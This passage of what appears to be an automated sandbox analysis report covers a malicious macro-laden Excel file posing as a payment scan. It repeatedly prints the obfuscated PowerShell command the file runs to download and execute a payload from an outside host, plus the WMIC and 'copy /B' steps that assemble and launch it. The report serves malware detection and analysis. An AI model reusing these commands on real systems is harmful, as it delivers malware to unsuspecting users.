    • https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
    • https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
    • https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
    • https://portal.office.com/account/?ref=ClientMeControl
    • https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
    • https://powerlift-frontdesk.acompli.net
    • https://powerlift.acompli.net
    • https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://settings.outlook.com
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://shell.suite.office.com:1443
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://skyapi.live.net/Activity/
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://staging.cortana.ai
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://store.office.cn/addinstemplate
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://store.office.com/addinstemplate
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://store.office.de/addinstemplate
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://tasks.office.com
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://templatelogging.office.com/client/log
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://web.microsoftstream.com/video/
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://webshell.suite.office.com
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://wus2-000.contentsync.
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
      Source: 6F929868-7C3F-4808-A89F-5BECCA241772.0.drString found in binary or memory: https://www.odwebp.svc.ms
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Windows user hook set: 0 mouse low level NULL

      System Summary:

      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
      Source: Screenshot number: 4 | Screenshot OCR: Enable Content 5 Al - " ;& r 6 I A I B C D E F I G I H I I I J C 7 8 1 9 2 10 3 11 4
      Source: Screenshot number: 8 | Screenshot OCR: Enable Editing" form the yellow bar and then click 5 8 "Enable Content" ,6 g 7 10 ,8 11 ,9 12
      Source: Screenshot number: 8 | Screenshot OCR: Enable Content X ' . Al " (" jR " 5 7 A B I C I D I, E I F G H I J K 'T , 1 I y 3 2 : Qil D?'
      Contains functionality to create processes via WMI
      Source: WMIC.exe, 0000001A.00000002.345078681.00000000035D0000.00000004.00000020.sdmp | Binary or memory string: C:\Users\user\Documents\C:\Windows\SysWOW64\Wbem\WMIC.exeWmIC PRocESs CAlL cREAtE C:\Users\user\AppData\Local\Temp\Test3.jpgWmIC PRocESs CAlL cREAtE C:\Users\user\AppData\Local\Temp\Test3.jpgWinSta0\Default
      Found Excel 4.0 Macro with suspicious formulas
      Source: Scanned_25526662-Payment.xls | Initial sample: EXEC
      Powershell drops PE file
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\Test1.txt
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Code function: 27_2_00424D1A NtAllocateVirtualMemory,NtProtectVirtualMemory,NtProtectVirtualMemory,
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Code function: 27_2_022100C7 NtCreateSection,NtMapViewOfSection,CreateProcessW,NtGetContextThread,NtReadVirtualMemory,NtWriteVirtualMemory,NtUnmapViewOfSection,NtMapViewOfSection,NtSetContextThread,NtResumeThread,
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Code function: 27_2_0221002C NtCreateSection,NtMapViewOfSection,CreateProcessW,NtGetContextThread,NtReadVirtualMemory,NtWriteVirtualMemory,NtUnmapViewOfSection,NtMapViewOfSection,NtSetContextThread,NtResumeThread,
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Code function: 27_2_0221000B NtCreateSection,NtMapViewOfSection,CreateProcessW,NtGetContextThread,NtReadVirtualMemory,NtWriteVirtualMemory,NtUnmapViewOfSection,NtMapViewOfSection,NtSetContextThread,NtResumeThread,
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Code function: 27_2_02210072 NtCreateSection,NtMapViewOfSection,CreateProcessW,NtGetContextThread,NtReadVirtualMemory,NtWriteVirtualMemory,NtUnmapViewOfSection,NtMapViewOfSection,NtSetContextThread,NtResumeThread,
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Code function: 29_2_00478772 __EH_prolog,GetModuleHandleA,GetProcAddress,GetCurrentThread,NtSetInformationThread,
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Code function: 29_2_005C6B10: new,DeviceIoControl,
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Code function: 29_2_006940D0
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Code function: 29_2_006849A0
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Code function: 29_2_0040EA7D
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Code function: 29_2_004F2AA7
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Code function: 29_2_0042ABC1
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Code function: 29_2_0068321E
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Code function: 29_2_00411532
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Code function: 29_2_004276C4
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Code function: 29_2_00689D67
      Source: Scanned_25526662-Payment.xls | OLE indicator, VBA macros: true
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Code function: String function: 006876A0 appears 81 times
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Code function: String function: 006811C5 appears 69 times
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Code function: String function: 006B08FC appears 794 times
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Code function: String function: 00411C35 appears 39 times
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Code function: String function: 00680E81 appears 125 times
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Code function: String function: 006850AE appears 33 times
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Code function: String function: 005CEF10 appears 131 times
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Code function: String function: 00411FB1 appears 168 times
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Code function: String function: 00696B06 appears 44 times
      Source: nwaha3c5.dll.21.dr | Static PE information: No import functions for PE file found
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kdscli.dll
      Source: Scanned_25526662-Payment.xls, type: SAMPLE | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
      Source: C:\Users\user\Desktop\1BA10000, type: DROPPED | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
      Source: Test3.jpg.23.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: classification engine | Classification label: mal100.troj.expl.evad.winXLS@19/22@1/2
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Code function: 29_2_0045624F __EH_prolog,CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,CloseHandle,
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Code function: 29_2_004231B3 __CxxThrowException@8,GetLastError,LoadResource,LockResource,SizeofResource,
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache
      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6896:120:WilError_01
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Mutant created: \Sessions\1\BaseNamedObjects\693cae42864dd7a2e04c35636e49f749
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\{BF342920-9C68-4407-BD39-EA487E52A3EE} - OProcSessId.dat
      Source: Scanned_25526662-Payment.xls | OLE indicator, Workbook stream: true
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
      Source: C:\Windows\SysWOW64\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File read: C:\Users\desktop.ini
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
      Source: Scanned_25526662-Payment.xls | Virustotal: Detection: 14%
      Source: Scanned_25526662-Payment.xls | ReversingLabs: Detection: 15%
      Source: unknown | Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
      Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe cmd.eXE /c PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' ))
      Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' ))
      Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.cmdline'
      Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESBD2F.tmp' 'c:\Users\user\AppData\Local\Temp\nwaha3c5\CSCEA75873C5D80459DA0D513336FABE338.TMP'
      Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /C COPy /B %TEMP%\Test1.txt + %TEMP%\Test2.gif %TEMP%\Test3.jpg
      Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /C WmIC PRocESs CAlL cREAtE %TEMP%\Test3.jpg
      Source: unknown | Process created: C:\Windows\SysWOW64\wbem\WMIC.exe WmIC PRocESs CAlL cREAtE C:\Users\user\AppData\Local\Temp\Test3.jpg
      Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\Test3.jpg C:\Users\user\AppData\Local\Temp\Test3.jpg
      Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\Test3.jpg C:\Users\user\AppData\Local\Temp\Test3.jpg
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\cmd.exe cmd.eXE /c PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' ))
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' ))
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.cmdline'
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /C COPy /B %TEMP%\Test1.txt + %TEMP%\Test2.gif %TEMP%\Test3.jpg
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /C WmIC PRocESs CAlL cREAtE %TEMP%\Test3.jpg
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESBD2F.tmp' 'c:\Users\user\AppData\Local\Temp\nwaha3c5\CSCEA75873C5D80459DA0D513336FABE338.TMP'
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wbem\WMIC.exe WmIC PRocESs CAlL cREAtE C:\Users\user\AppData\Local\Temp\Test3.jpg
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Process created: C:\Users\user\AppData\Local\Temp\Test3.jpg C:\Users\user\AppData\Local\Temp\Test3.jpg
      Source: C:\Windows\SysWOW64\wbem\WMIC.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
      Source: Window Recorder | Window detected: More than 3 window changes detected
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll

      Data Obfuscation:

      PowerShell case anomaly found
      Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe cmd.eXE /c PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' ))
      Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' ))
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\cmd.exe cmd.eXE /c PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' ))
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' ))
      Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.cmdline'
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.cmdline'
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Code function: 29_2_007D5210 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Code function: 27_2_00402F43 pushfd ; iretd
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Code function: 29_2_00682156 push ecx; ret
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Code function: 29_2_006B08FC push eax; ret
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Code function: 29_2_006B099C push ecx; ret
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Code function: 29_2_00400F04 push eax; ret
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Code function: 29_2_0068118E push ecx; ret
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg | Code function: 29_2_0042BBAE push eax; ret
      Source: initial sample | Static PE information: section name: .text entropy: 7.92605680707

      Persistence and Installation Behavior:

      Creates processes via WMI
      Source: C:\Windows\SysWOW64\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\Test1.txt
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.dll
      Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\Test3.jpg
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1\Hyper-V.psd1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.psm1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.ni.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0\Hyper-V.psd1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.cdxml
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.xaml
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.psd1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Thread delayed: delay time: 922337203685477
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5429
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1580
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Window / User API: threadDelayed 2267
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Test1.txt
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.dll
      Source: C:\Windows\System32\conhost.exe TID: 6928 Thread sleep count: 213 > 30
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7048 Thread sleep count: 5429 > 30
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7076 Thread sleep count: 41 > 30
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7052 Thread sleep count: 1580 > 30
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4456 Thread sleep time: -1844674407370954s >= -30000s
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7104 Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7024 Thread sleep time: -30000s >= -30000s
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7112 Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg TID: 5676 Thread sleep count: 2267 > 30
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg TID: 5784 Thread sleep count: 38 > 30
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg TID: 5784 Thread sleep time: -380000s >= -30000s
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg TID: 5840 Thread sleep time: -3689348814741908s >= -30000s
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg TID: 5192 Thread sleep count: 297 > 30
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg TID: 5192 Thread sleep time: -30000s >= -30000s
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Last function: Thread delayed
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Thread sleep count: Count: 2267 delay: -10
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_00426F7A GetFullPathNameW,FindFirstFileExW,GetLastError,
      Source: C:\Users\user\AppData\Local\Temp\Test3.jpg Code function: 29_2_0044A238 __EH_prolog,new,GetModuleHandleA,GetProcAddress,GetSystemInfo,GetProductInfo,
      Source: ModuleAnalysisCache.3.dr Binary or memory string: Add-VMNetworkAdapter
      Source: ModuleAnalysisCache.3.dr Binary or memory string: Remove-VMNetworkAdapterExtendedAcl
      Source: ModuleAnalysisCache.3.dr Binary or memory string: Set-VMNetworkAdapterTeamMapping
      Source: ModuleAnalysisCache.3.dr Binary or memory string: Connect-VMNetworkAdapter
      Source: ModuleAnalysisCache.3.dr Binary or memory string: Add-VMNetworkAdapterExtendedAcl
      Source: WMIC.exe, 0000001A.00000002.345562483.0000000003920000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
      Source: ModuleAnalysisCache.3.dr Binary or memory string: Get-VMNetworkAdapterTeamMapping
      Source: ModuleAnalysisCache.3.dr Binary or memory string: Get-VMNetworkAdapterIsolation
      Source: ModuleAnalysisCache.3.dr Binary or memory string: Test-VMNetworkAdapter
      Source: ModuleAnalysisCache.3.dr Binary or memory string: )Get-VMNetworkAdapterFailoverConfiguration
